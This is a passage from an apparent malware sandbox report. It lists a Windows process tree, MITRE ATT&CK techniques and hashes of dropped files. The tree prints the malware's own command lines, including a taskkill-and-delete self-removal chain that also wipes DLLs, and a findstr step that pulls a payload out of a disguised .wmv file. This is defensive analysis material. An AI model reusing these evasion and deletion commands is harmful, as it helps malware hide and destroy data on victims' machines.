                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:5436
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                                                          l.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6048
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2784
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4232
                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5720
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2240
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:384
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5580
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5528
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6080
                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\52D0.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\52D0.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5856
                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                            cmd /c start c.exe & start l.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:224
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c.exe
                                                                                                                                                                                                                c.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5324
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:736
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:3876
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                            findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:5300
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Puramente.exe.com
                                                                                                                                                                                                                              Puramente.exe.com m
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:5280
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:6108
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l.exe
                                                                                                                                                                                                                          l.exe
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3704
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\82AB.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\82AB.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D6E1.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D6E1.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4440
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im D6E1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D6E1.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:992
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /im D6E1.exe /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:1116
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:3540
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:4756
                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3268

                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                Security Software Discovery

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1063

                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  2022b07b3b8567bfe26f990e2660245a

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  b9f3407c37554faf583fd0dadd1c0ac5f0e9a317

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  d76562fa77b3e88de974a452adb14cde3e9bca24eb75ee1af72bbc839ce061f1

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  abe9647250ca62b33abff40507fb8936bfdfbe89d26be619df160181b9505eacb7ab0fe5860db4becd99ea8b6d4d42f69dc41678c778259fb8c4782ccfdb773b

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pf0yYeEWUhuD3yRLEImgHEma.exe.log
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\libcurl.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\libcurlpp.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\libstdc++-6.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\libwinpthread-1.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\setup_install.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\setup_install.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_1.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_2.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_2.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_3.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_3.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_4.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_4.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_5.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_5.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_6.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08C23884\sonia_6.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                  SHA256

